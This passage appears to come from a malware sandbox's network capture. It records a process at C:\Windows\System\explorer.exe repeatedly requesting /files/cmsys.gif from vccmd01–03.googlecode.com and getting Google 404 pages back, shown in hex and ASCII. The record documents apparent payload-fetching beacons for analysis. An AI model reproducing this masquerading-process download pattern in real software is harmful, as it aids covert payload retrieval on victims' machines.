                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:05.329246044 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    91192.168.2.560747142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:05.917105913 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:06.844583988 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:06 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:06.844629049 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    92192.168.2.56074964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:08.832148075 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:09.754590034 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:09 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:09.755464077 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    93192.168.2.560750108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:09.973119020 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:10.897157907 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:10 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:10.897182941 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    94192.168.2.560751142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:11.227988958 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.140789986 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:12 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.140899897 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    95192.168.2.56075364.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:14.427118063 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:15.353041887 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:15 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:15.353104115 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    96192.168.2.560754108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:15.739763021 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:16.661036015 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:16 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:16.661093950 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    97192.168.2.560755142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:16.882730007 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:17.794800997 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:17 GMT
